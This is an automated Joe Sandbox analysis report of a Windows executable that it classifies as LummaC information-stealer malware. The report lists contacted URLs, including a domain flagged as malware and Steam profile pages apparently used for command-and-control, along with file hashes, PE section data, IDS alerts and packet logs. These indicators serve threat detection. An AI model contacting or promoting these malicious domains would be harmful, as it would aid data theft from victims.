                                                                                                                                                                                  https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/sh8file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://arisechairedd.shop:443/JnsHYfile.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://steamcommunity.com/profiles/76561199822375128bfile.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_alldp.icofile.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://store.steampowered.com/stats/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://medal.tvfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vfile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://x1.c.lencr.org/0file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://x1.i.lencr.org/0file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&amp;l=enfile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pfile.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | guntac.bet | European Union | 13335 | CLOUDFLARENETUS | false
104.73.234.102 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1637453
Start date and time: 2025-03-13 16:39:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 23.60.203.209
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 6392 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
11:40:15 | API Interceptor | 22x Sleep call for process: file.exe modified
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      nyojpsdfkawed.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      nbvtiopwadkkth.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.906699567471614
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'111'488 bytes
MD5: 6f5fd4f79167a7e2c0db0a9f925118b4
SHA1: 5a9887316db9016897fbb8e7e349ec5e27fb6ba8
SHA256: ceb426731770a6cc7dcf8eb3a1c0f861e3e5e94562f7c0c37003219485e47509
SHA512: 21facc6cf914f1ca5d1a7ce8f7ceac914409e4f6a8dd7b32e3d74a0f0167c7b16d44b0c82c51c9b1bf65cfa1b6fb9ee54460ce5cf25f40fc9c95c8b459a19b93
SSDEEP: 49152:TmTINWxavCEC3+CEgCWK/ipp1l7sda2hq+9oYA:TwIAxavHC3+ClPGEDf219oY
TLSH: A1A52206F12C400CE07554B6AB8B41826DFBB6FBD3423ED0DAA9476AE8C7FC95447C69
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..............................J...........@...........................J......b ...@.................................W...k..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x8ac000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67C9DDEB [Thu Mar 6 17:39:55 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x611f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x5f000 | 0x5f000 | 7bf8a74bb0728007a0ad1c3d0136a1e0 | False | 0.5962016858552631 | data | 7.1961402952181865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x60000 | 0x2b0 | 0x200 | 89beb1790d30bb265321a36fbd85a87e | False | 0.794921875 | data | 6.056544265976366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x61000 | 0x1000 | 0x200 | f47b289bcee0e13a937cc29db13607bf | False | 0.150390625 | data | 1.0437720338377494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x62000 | 0x2a8000 | 0x200 | 785407fd88ab9c7d374fa937134eb7fd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
udvczyhg | 0x30a000 | 0x1a1000 | 0x1a0a00 | 63963bd63af726274823b743676800b4 | False | 0.9945707461371137 | data | 7.954347737644204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wrnawoey | 0x4ab000 | 0x1000 | 0x600 | 76f5a1bd81ab45f02c8c4ac58e916d88 | False | 0.583984375 | data | 5.006195236146998 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4ac000 | 0x3000 | 0x2200 | ea5f7f57f1933d7510eb64428542851d | False | 0.07146139705882353 | DOS executable (COM) | 0.793932516431419 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4aa790 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535

DLL | Import
kernel32.dll | lstrcpy

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-13T16:40:03.885406+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49700 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:03.885406+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49697 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:03.885406+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49703 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:03.885406+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:12.999379+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49682 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:15.930609+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49683 | 188.114.97.3 | 443 | TCP
2025-03-13T16:40:19.449635+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49684 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:22.189166+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49685 | 188.114.97.3 | 443 | TCP
2025-03-13T16:40:25.133637+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49686 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:28.100390+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49688 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:31.495330+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49693 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:34.325343+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49694 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:37.749650+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49695 | 104.73.234.102 | 443 | TCP
2025-03-13T16:40:40.555151+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49696 | 104.73.234.102 | 443 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.933666945 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.933942080 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.935172081 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.935172081 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.935244083 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.889833927 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927072048 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927139997 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927171946 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927206039 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927227974 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927237034 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927246094 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927265882 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927289009 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.933593035 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.933665991 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.933684111 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.940356970 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.940457106 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.940483093 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.940834999 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.940989971 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.954720020 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.954751968 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.954765081 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.954776049 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:17.860827923 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:17.860868931 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:17.860937119 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:17.861253977 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:17.861277103 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:19.449572086 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:19.449635029 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:19.451152086 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:19.451173067 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:19.451481104 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:19.452935934 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:19.496330023 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.459593058 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.459605932 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.459639072 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.459645987 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.459672928 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.459691048 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.459711075 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.459731102 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.601106882 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.601140976 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.601200104 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.601228952 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.601258039 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.601267099 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.606271982 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.606333971 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.634493113 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.634553909 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.634553909 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.634593010 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.634660006 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.634680986 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.634704113 CET49684443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.634710073 CET44349684104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.637279034 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.637327909 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.637391090 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.637953043 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:20.637965918 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:22.189084053 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:22.189166069 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:22.190617085 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:22.190628052 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:22.190864086 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:22.192056894 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:22.192256927 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:22.192286968 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.164796114 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.164901018 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.164987087 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.165142059 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:23.165158033 CET44349685188.114.97.3192.168.2.8
